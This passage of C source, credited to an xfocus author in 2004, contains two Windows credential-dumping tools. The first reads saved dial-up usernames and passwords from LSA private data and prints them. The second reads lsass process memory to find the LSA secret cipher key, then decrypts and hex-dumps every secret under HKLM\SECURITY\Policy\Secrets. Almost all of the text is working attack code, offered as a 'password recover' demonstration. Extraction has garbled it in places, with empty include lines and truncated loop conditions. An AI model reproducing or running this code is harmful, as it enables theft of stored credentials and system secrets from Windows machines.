eyas at xfocus.org
http://www.xfocus.net
2004-10-01
FileName: x_dialupass.c
*/
#define WINVER 0x500
#define _WIN32_WINNT 0x0500
#include
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"Rasapi32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"UserEnv.lib")
unsigned char private_data[0x500];
int data_len;
unsigned char * get_real_pass(unsigned char *user, DWORD dwDialParamsUID)
{
int i, j;
unsigned char *p, szDialParamsUID[52], *pass=NULL;
_snprintf(szDialParamsUID, sizeof(szDialParamsUID),
"%d", dwDialParamsUID);
p = private_data;
for(i=0;i{
if(strcmp(&p[i], szDialParamsUID) == 0 )
{
for(j=i;j{
if(strcmp(&p[j], user) == 0 )
{
pass = p + j + strlen(user) + 1;
break;
}
}
break;
}
}
return pass;
}
void main()
{
LPRASENTRYNAME lpRasEntryName;
LPRASDIALPARAMS lpRasDialParams;
DWORD cb, nRet, i, cEntries;
BOOL b;
char szPhoneBook1[512], szPhoneBook2[512],
szUserName[128], szDomainName[128];
DWORD dwSize, dwDialParamsUID, dwTmp;
PSID pSid = NULL;
SID_NAME_USE peUse;
LSA_OBJECT_ATTRIBUTES lsa_object_attr;
LSA_HANDLE lsa_handle;
PLSA_UNICODE_STRING plsa_private_data;
LSA_UNICODE_STRING lsa_keyname;
NTSTATUS status;
int ret;
unsigned char *pass;
WCHAR *sid;
printf("dialup password recover tool for win 2k/xp/2003\n"
"code by eyas at xfocus.org\n"
"http://www.xfocus.net\n"
"2004-10-01\n\n");
//get current user's string sid
dwSize = sizeof(szUserName);
GetUserName(szUserName, &dwSize);
dwSize = 0;
dwTmp = sizeof(szDomainName);
LookupAccountName(NULL, szUserName, pSid, &dwSize, szDomainName,
&dwTmp, &peUse);
if(!dwSize)
{
printf("[-] LookupAccountName failed.\n");
return;
}
pSid = (PSID)malloc(dwSize);
LookupAccountName(NULL, szUserName, pSid, &dwSize, szDomainName,
&dwTmp, &peUse);
ConvertSidToStringSidW(pSid, &sid);
memset(&lsa_object_attr, 0, sizeof(lsa_object_attr));
lsa_object_attr.Length = sizeof(LSA_OBJECT_ATTRIBUTES);
LsaOpenPolicy(0, &lsa_object_attr, 0x800, &lsa_handle);
plsa_private_data = (PLSA_UNICODE_STRING)malloc(sizeof(LSA_UNICODE_STRING));
plsa_private_data->Length = 0x500;
plsa_private_data->MaximumLength = 0x500;
plsa_private_data->Buffer = (PWSTR)malloc(0x500);
lsa_keyname.MaximumLength = 0x200;
lsa_keyname.Buffer = (PWSTR)malloc(0x200);
wcscpy(lsa_keyname.Buffer,L"RasDialParams!");
wcscat(lsa_keyname.Buffer, sid);
wcscat(lsa_keyname.Buffer, L"#0");
lsa_keyname.Length = wcslen(lsa_keyname.Buffer) * 2;
//get current user's dialup info
status = LsaRetrievePrivateData(lsa_handle,
&lsa_keyname,
&plsa_private_data);
LsaClose(lsa_handle);
if(status != 0)
{
printf("[-] LsaRetrievePrivateData failed: %d\n",
LsaNtStatusToWinError(status));
return;
}
ret = WideCharToMultiByte(0, 0, plsa_private_data->Buffer,
plsa_private_data->Length,
private_data, sizeof(private_data), 0, 0);
if(ret == 0)
{
printf("[-] WideCharToMultiByte failed:%d\n", GetLastError());
return;
}
data_len = ret;
//get phone book name
GetEnvironmentVariable("ALLUSERSPROFILE", szPhoneBook1,
sizeof(szPhoneBook1)-200);
GetEnvironmentVariable("USERPROFILE", szPhoneBook2,
sizeof(szPhoneBook2)-200);
strcat(szPhoneBook1,
"\\Application Data\\Microsoft\\Network"
"\\Connections\\pbk\\rasphone.pbk");
strcat(szPhoneBook2,
"\\Application Data\\Microsoft\\Network"
"\\Connections\\pbk\\rasphone.pbk");
lpRasEntryName = (LPRASENTRYNAME)GlobalAlloc(GPTR, sizeof(RASENTRYNAME));
lpRasEntryName->dwSize = sizeof(RASENTRYNAME);
cb = sizeof(RASENTRYNAME);
if ((nRet = RasEnumEntries(NULL, NULL, lpRasEntryName, &cb, &cEntries))
== ERROR_BUFFER_TOO_SMALL)
{
lpRasEntryName = (LPRASENTRYNAME)GlobalAlloc(GPTR, cb);
lpRasEntryName->dwSize = sizeof(RASENTRYNAME);
}
// Calling RasEnumEntries to enumerate the phone-book entries
nRet = RasEnumEntries(NULL, NULL, lpRasEntryName, &cb, &cEntries);
if (nRet != ERROR_SUCCESS)
{
printf("[-] RasEnumEntries failed: Error %d\n", nRet);
return;
}
for(i=0;i < cEntries;i++)
{
lpRasDialParams = malloc(sizeof(RASDIALPARAMS));
strcpy(lpRasDialParams->szEntryName, lpRasEntryName->szEntryName);
lpRasDialParams->dwSize = sizeof(RASDIALPARAMS);
RasGetEntryDialParams(0, lpRasDialParams, &b);
dwDialParamsUID = GetPrivateProfileInt(lpRasEntryName->szEntryName,
"DialParamsUID", 0, szPhoneBook1);
if(dwDialParamsUID == 0)
{
dwDialParamsUID = GetPrivateProfileInt(lpRasEntryName->szEntryName,
"DialParamsUID", 0, szPhoneBook2);
if(dwDialParamsUID == 0)
{
printf("[-] Can't get DialParamsUID from PhoneBook.\n");
return;
}
}
pass = get_real_pass(lpRasDialParams->szUserName, dwDialParamsUID);
printf(
"-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"
"EntryName : %s\n"
"UserName : %s\n"
"PassWord : %s\n\n",
lpRasEntryName->szEntryName,
lpRasDialParams->szUserName,
pass);
free(lpRasDialParams);
lpRasEntryName++;
}
}
-=-=-=-=-=-=-=-=-=-= code end -=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-= x_dialupass2.cpp -=-=-=-=-=-=-=-=-=-=
/*
演示还原NT平台拨号连接密码
原理:直接从注册表中读取加密后的数据,解密之。
可运行于windows 2000/xp/2003平台,必须有权限读取注册表 "HKLM\SECURITY"。
eyas at xfocus.org
http://www.xfocus.net
2004-10-01
*/
#include
#include
#include
#pragma comment(lib, "Advapi32.lib")
#pragma comment(lib, "psapi.lib")
//抄袭tombkeeper的代码:)
#define FCHK(a) if (!(a)) {printf(#a " failed %d\n", GetLastError()); return
0;}
typedef struct _LSA_BLOB {
DWORD cbData;
DWORD cbMaxData;
BYTE* pbData;
} LSA_BLOB;
typedef int (WINAPI *PSystemFunction005)(
LSA_BLOB* pDataIn,
LSA_BLOB* pDataKey,
LSA_BLOB* pDataOut
);
PSystemFunction005 SystemFunction005;
DWORD dwFlag=0;
//来自lsadump2中的dumplsa.c
int myisprint (int ch)
{
return ((ch >= ' ') && (ch <= '~'));
}
//来自lsadump2中的dumplsa.c
void
dump_bytes (unsigned char *p, size_t sz)
{
char szDumpBuff[256];
if(sz==0)
return;
while (sz > 16) {
_snprintf (szDumpBuff, sizeof (szDumpBuff),
" %02X %02X %02X %02X %02X %02X %02X %02X %02X %02X %02X %02X
%02X %02X %02X %02X %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",
p[0], p[1], p[2], p[3], p[4], p[5], p[6], p[7],
p[8], p[9], p[10], p[11], p[12], p[13], p[14], p[15],
myisprint(p[0]) ? p[0] : '.',
myisprint(p[1]) ? p[1] : '.',
myisprint(p[2]) ? p[2] : '.',
myisprint(p[3]) ? p[3] : '.',
myisprint(p[4]) ? p[4] : '.',
myisprint(p[5]) ? p[5] : '.',
myisprint(p[6]) ? p[6] : '.',
myisprint(p[7]) ? p[7] : '.',
myisprint(p[8]) ? p[8] : '.',
myisprint(p[9]) ? p[9] : '.',
myisprint(p[10]) ? p[10] : '.',
myisprint(p[11]) ? p[11] : '.',
myisprint(p[12]) ? p[12] : '.',
myisprint(p[13]) ? p[13] : '.',
myisprint(p[14]) ? p[14] : '.',
myisprint(p[15]) ? p[15] : '.');
printf ("%s", szDumpBuff);
p+=16;
sz -= 16;
}
if (sz) {
char buf[17];
int i = 0;
int j = 16 - sz;
memset (buf, 0, sizeof (buf));
szDumpBuff[0] = 0;
while (sz--) {
_snprintf (szDumpBuff+strlen (szDumpBuff),
sizeof (szDumpBuff) - strlen (szDumpBuff),
" %02X", *p);
if (myisprint (*p))
buf[i++] = *p;
else
buf[i++] = '.';
p++;
}
_snprintf (szDumpBuff+strlen (szDumpBuff),
sizeof (szDumpBuff)-strlen (szDumpBuff),
"%*s%s\n", j*3 + 2, "", buf);
printf ("%s", szDumpBuff);
}
}
DWORD search_LsapDbSecretCipherKey(BYTE **ppKey, DWORD pid)
{
HANDLE hLsass, hLsasrv;
DWORD dwRead, i, dwAddr;
BYTE *pImage = NULL;
MODULEINFO mod;
BOOL bRet = FALSE;
DWORD dwCount = 0, dwMaxCount=100;
FCHK ( (hLsasrv = LoadLibrary("lsasrv.dll")) );
FCHK ( GetModuleInformation(GetCurrentProcess(), (HMODULE)hLsasrv,
&mod, sizeof(mod)) );
FCHK ( hLsass = OpenProcess(PROCESS_VM_READ, FALSE, pid) );
pImage = (BYTE*)malloc(mod.SizeOfImage);
ReadProcessMemory(hLsass, (BYTE*)hLsasrv,
pImage, mod.SizeOfImage-0x10, &dwRead);
*ppKey = (BYTE*)malloc(dwMaxCount*0x10);
__try
{
for(i=0;i{
if( memcmp(&pImage[i], "\x10\x00\x00\x00\x10\x00\x00\x00", 8) == 0)
{
dwAddr = *(DWORD *)(&pImage[i+8]);
if( ReadProcessMemory(hLsass, (LPCVOID)dwAddr,
&(*ppKey[dwCount*0x10]), 0x10, &dwRead) )
{
dwCount++;
}
}
}//end of for
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
return dwCount;
}
return dwCount;
}
int main(int argc, char **argv)
{
int ret,i,j;
HMODULE hAdvApi32;
HKEY hKeySecrets;
HKEY hKey;
DWORD dwType;
char Data[0x500] = {0};
BYTE *pKey;
DWORD dwSize;
LSA_BLOB LSADataIn;
LSA_BLOB LSADataOut;
LSA_BLOB LSADataKey;
char szSecret[500];
char szSubKey[0x500];
DWORD dwErr, dwCount=0;
if(argc!=2)
{
printf("Usage: %s \n", argv[0]);
return 0;
}
FCHK ((hAdvApi32 = LoadLibrary("advapi32.dll")));
FCHK ((SystemFunction005 = (PSystemFunction005)
GetProcAddress (hAdvApi32, "SystemFunction005")) != NULL);
FCHK ((RegOpenKeyEx (HKEY_LOCAL_MACHINE,
"SECURITY\\Policy\\Secrets",
0, KEY_READ, &hKeySecrets) == ERROR_SUCCESS))
FCHK ( ( dwCount = search_LsapDbSecretCipherKey(&pKey, atoi(argv[1])) ) != 0
);
printf("Search \"LsapDbSecretCipherKey\" return: %d\n", dwCount);
for(j=0;j{
printf("LsapDbSecretCipherKey [%d]\n", j);
dump_bytes(&pKey[j*0x10], 0x10);
LSADataKey.cbData = LSADataKey.cbMaxData = 0x10;
LSADataKey.pbData = &pKey[j*0x10];
//search our target
for (i=0; TRUE; i++)
{
dwErr = RegEnumKeyA (hKeySecrets, i, szSecret, sizeof (szSecret));
if (dwErr != ERROR_SUCCESS)
//
// No More Secrets
//
break;
printf("\n%s\n", szSecret);
//open it
_snprintf(szSubKey, sizeof(szSubKey),
"SECURITY\\Policy\\Secrets\\%s\\CurrVal", szSecret);
if (ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
szSubKey,
0,
KEY_READ,
&hKey
) != ERROR_SUCCESS )
continue;
dwSize = sizeof(Data);
FCHK ((ret = RegQueryValueEx(hKey,
"",
NULL,
&dwType,
(LPBYTE)Data,
&dwSize) == ERROR_SUCCESS ))
LSADataIn.pbData = (BYTE *)Data + 0xC; //密文从第0xC位开始
LSADataIn.cbData = dwSize-0xC;
LSADataIn.cbMaxData = LSADataIn.cbData;
//dump_bytes(LSADataIn.pbData, LSADataIn.cbData);
LSADataOut.cbData = 0;
LSADataOut.cbMaxData = 0;
LSADataOut.pbData = NULL;
SystemFunction005(&LSADataIn, &LSADataKey, &LSADataOut);
if (LSADataOut.cbData == 0)
{
printf("null\n");
continue;
}
FCHK ((LSADataOut.pbData = (BYTE*)malloc(LSADataOut.cbData) ) !=
NULL);
LSADataOut.cbMaxData = LSADataOut.cbData;
SystemFunction005(&LSADataIn, &LSADataKey, &LSADataOut);
dump_bytes(LSADataOut.pbData, LSADataOut.cbData);
free(LSADataOut.pbData);
}//end of for
printf("Press any key to use next \"LsapDbSecretCipherKey\", or Ctrl+C
to exit.\n");
getchar();
}
if(pKey)
free(pKey);
return 0;
} |
相关 
